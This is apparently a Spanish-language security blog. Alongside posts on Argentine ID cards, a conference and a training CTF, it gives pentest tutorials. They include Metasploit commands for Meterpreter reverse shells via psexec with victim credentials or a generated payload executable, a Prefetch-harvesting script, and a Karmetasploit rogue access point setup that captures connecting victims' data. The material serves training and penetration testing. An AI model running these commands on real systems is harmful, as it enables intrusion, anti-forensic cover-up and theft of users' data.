Seguridad de los nuevos DNI Argentinos

En el blog de Matt me encontré con un interesante video de La Nación que relata las medidas de seguridad de los nuevos DNI Argentinos.

Casualmente, hace alrededor de 1 mes inicie los tramites para obtener un nuevo DNI porque me perdieron el anterior (si Gesolmina, fuistes vos!), obviamente esperaba tener mi documento para el 2011, con suerte. Pero increíblemente, a solo unos días del anuncio de los nuevos DNI, hoy llego Correo Argentino a traerme mi nuevo documento!

Ahora, yo no puedo tener mas mala suerte, el cartero me pedía un "papelito" que supuestamente me dieron cuando realice el tramite, y como no se donde deje ese papelito, no me entrego el DNI... aaaarrgggggggHHH!!!

PampaSeg en Diciembre

El próximo 4 y 5 de Diciembre tendrán lugar las Jornadas de Software Libre y Seguridad Informatica en La Pampa.

El evento es abierto a toda la comunidad, con entrada libre y gratuita. El cupo es limitado a unas 100 personas aproximadamente, por lo cual se requerirá una pre-acreditación desde la web http://www.pampaseg.com

Voy a tener el gusto de dar una charla en este evento, asi que si estan por La Pampa por esas fechas nos vemos alli!

Prefetch en Meterpreter

Siempre me llama la atención la integración de técnicas forenses y anti-forenses al Penetration Testing, como el reciente script para Meterpreter que permite obtener los datos de Prefetch.

¿ Que es Prefetch ?

Cada vez que abrimos una aplicación en Windows se crea un archivo ".pf" en el directorio (%SYSTEMROOT%\Prefetch\), este archivo contiene información para acelerar las aplicaciones que seran abiertas en el futuro.

Dentro del archivo .pf podemos encontrar la fecha y hora en la que el archivo fue abierto, modificado o accedido por ultima vez, y también la cantidad de veces que este fue ejecutado.

El nombre del archivo .pf se arma "NOMBRE-HASH.pf", en donde el HASH se calcula con el path del lugar en donde se encontraba el archivo, por lo que si este fue ejecutado de 2 lugares diferentes, vamos a tener 2 archivos .pf diferentes.

Durante un Penetration Test, conocer cuales son los programas mas utilizados en un sistema nos puede ayudar a identificar los hábitos del administrador o el rol de este sistema en la red.

Hay una herramienta gratuita llamada Windows File Analyzer que nos permite visualizar el contenido de los archivos Prefetch:

Shell con Meterpreter

A continuación dos formas sencillas de obtener una shell con meterpreter sin necesidad de explotar una vulnerabilidad.

El siguiente modulo es similiar al "psexec" de SysInternals, y si le proveemos el user/pass de la víctima, nos permitira ejecutar un "payload":

use windows/smb/psexec
set PAYLOAD windows/metepreter/reverse_tcp
set RHOST 192.168.13.129
set LHOST 192.168.13.131
set SMBUser Administrador
set SMBPass password
exploit

Otra forma, es crear un binario con el payload, lo transferimos a la víctima, luego dejamos escuchando por la conexión reversa y ejecutamos el binario para generar la conexión con meterpreter:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.13.131 X > meterpreter.exe

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.13.131 E

Prefetch con Meterpreter

Para utilizar Prefetch primero deberíamos actualizar Metasploit (esto hacerlo antes de obtener la shell):

cd /pentest/exploits/framework3
svn update

./msfconsole
run prefetchtool -h

Si es la primera vez que utilizamos Prefetch, el script bajara "prefetch.exe" del repositorio, para luego subirlo y ejecutarlo en la víctima. A continuación listamos los 5 programas mas utilizados en la víctima con el comando "run prefetchtool -x 5":

Otra feature interesante dentro de meterpreter es "timestomp", que nos permite modificar la fecha de creación, modificación y ultimo acceso de los archivos, pero eso lo dejo para otro post... ;)

FUENTES:
- Milo2012's Security Blog: Meterpreter Script for Prefetch-Tool
- Laramies Corner: Windows Prefetcher and forensic analysis
- Windows File Analyzer
- PaulDotCom - Episode 171
- What is the Prefetcher?
- Forensics Wiki - Prefetch

Una Final Dramática!

El día de ayer termino el COMBAT training (extended edition) con una final dramática en el CTF "Capture The Flag"!

La versión extendida del COMBAT training se dicto 1 día por semana, durante 5 semanas, e iba dirigida a quienes no podían tomarse una semana completa de training.

Quiero felicitar a Patricio Castagnaro quien gano el CTF y se llevo la espada ninja, y también a Diego Nadares que dio una gran pelea en todo momento! También extender las felicitaciones a Esteban Piloni y Sergio "Moises" Veron por el gran trabajo durante toda la semana!

Como siempre los premios del COMBAT training son armas orientales, esta vez teníamos la espada ninja para el primer lugar, un set de cuchillos para lanzar para el segundo y estrellas ninjas para el resto.

Jeronimo Basaldua, el experto en Wireless Security de BASE4, dicto el modulo de Wireless Hacking del COMBAT training.

Lamentablemente Jeronimo sufrió un accidente manipulando la espada (miren su frente en la foto grupal), al parecer Jeronimo estudiaba kendo unos años atras y en una maniobra poco afortunada durante el training se corto a si mismo... :?

Por consultas sobre el COMBAT training contactarse a capacitacion@base4sec.com

Karmetasploit en BackTrack 4

Actualizando algunos labs del COMBAT training para BackTrack 4, aquí les dejo algunas notas para jugar con Karmetasploit.

- Ponemos la placa en modo monitor:

airmon-ng start wlan0


- Levantamos el Access Point falso en la interfaz en modo
monitor:

airbase-ng -P -C 30 -e “Linksys” -v mon0


- Configuramos el rango de IPs que entregara el servidor
DHCP:

nano /etc/dhcp3/dhcpd.conf

option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.140 10.0.0.240;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}


- Configuramos la IP en la interfaz que creo airbase-ng:

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0


- Levantamos el DHCP que le entregara las IPs a las
victimas que se conecten al Access Point falso:

/etc/init.d/dhcp3-server start


- Vemos las IPs que entrega el DHCP:

tail -f /var/log/messages


- Bajamos el script de Karma y corremos Metasploit:

cd /pentest/exploits/framework3

wget http://digitaloffense.net/tools/karma.rc

./msfconsole -r karma.rc


- Podemos obtener los datos guardados en karma.db
de esta forma:

sqlite3 karma.db
.tables
select * from notes;
.quit